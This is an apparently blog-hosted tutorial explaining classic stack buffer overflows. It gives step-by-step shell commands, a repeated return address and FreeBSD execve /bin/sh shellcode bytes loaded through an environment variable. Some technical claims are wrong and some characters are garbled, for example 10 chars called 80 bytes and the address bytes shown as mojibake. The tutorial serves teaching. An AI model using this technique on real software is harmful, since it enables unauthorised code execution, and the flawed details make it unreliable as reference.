Buffer Overflows Tutorial
If you are into IT Security/Hacking or whatever you call it, you probably came across BOF or Buffer Overflows.
In this article I will try to explain you the basic idea behind it . I am not going into great detail since there are plenty of texts out there doing that, I will just describe how this kind of bug works with a small example.
Note : At the end of this article you will find plenty of texts describing this technique in detail using examples
Every executable file, after we trigger it to run, is going to use some memory. (Remember that) Some memory segments used to store data some other instructions and some other memory pointers.
Imagine the following :
we do : ./tool
next we get that :
Memory for this tool Starts --------------> 0x8048448
BLABLA
0x8048451 call 0x8048440 <f>
BLABLA
BLABLA
Memory for this tool Ends --------------> 0x804845a
As you can see there is a Start and End for every execution , we will pay attention in between , where “tool” is calling some function. If we could change the 0×8048440 to an address we have load our code we could run anything we wanted during the execution of our application.
So , in order to change that address we need to overflow a buffer inside the “tool” . If we overflow it we can point it to our code somewhere else in the memory.
First of all, we need to find when “tool” overflows and cannot accept more data.
Lets imagine that there is a buffer in “tool” : char data[10]; used during the
execution procedure.
Easy to imagine what we need to do to overflow that buffer right ?
1) Create an enviroment : export BUFFER=`perl -e ‘{print “A”x”20″}’`
print "A"x"20" // This prints out the buffer we want to create
// Choose it in a way that a) if you know the buffer size
// try to make it twice as big or b) if you dont know
// The buffer size , create a very big e.g. print "A"x"2000"
2) Send to “tool” data bigger than 10xchar = 80bytes.
It depends on the software you want to exploit e.g
a) if tools take arguments from the command line like that : ./tool arg[0] arg[1] ..
We can pass our buffer doing that : ./tool $BUFFER
b) if tools take arguments like that : ./tool < argument
We can do that : ./tools < $BUFFER
Now you need to see the following error after executing the software, so you can be sure there is a buffer overflow on the spot :
[me@cipher]$ ./tool $BUFFER
Segmentation Fault (Core Dump)
Segmentation Fault means that we overflow the memory and we change the pointer.
If we look with GDB the registers, we will see that the EIP register is
0×41414141. (41 == A in hex.) which means that we change the CALL address to 0×41414141.
If we could overflow “tool” with an address we load our software we can run whatever we wanted.
OK , its a bit difficult to know the address we load our code , so we load our BOF exploit using enviroment , we do that cause we know where the env variables start.
Lets say that the environment variable start at : 0xbffffb54
If we want to pass out code in the buffer of “tool” we need to overflow
“tool” using 0xbffffb54 as argument.
so lets do that :
perl -e '{print "T���"x"20"}' > BUFFER.txt //T��� is the representation of 0xbffffb54
if we do : ./tool < BUFFER.txt , EIP will be 0xbffffb54 so we know it will
execute our code.
lets load a SHELLCODE in the environment and do it all together :
[me@cipher]$export BUFFER=`perl -e '{
print "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50
\x56\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff
\x2f\x62\x69\x6e\x2f\x73\x68\x23"}'`
[me@cipher]$perl -e '{print "T���"x"20"}' > BUFFER.txt
[me@cipher]$./tool < BUFFER.txt
$
SHELLCODEs are different for each OS and architecture. The one above is for FreeBSD.
The BEST Tutorials in BOF
Smashing The Stack For Fun And Profit
BOF with PERL
Stack Smashing Vulnerabilities
l0pht
leave a comment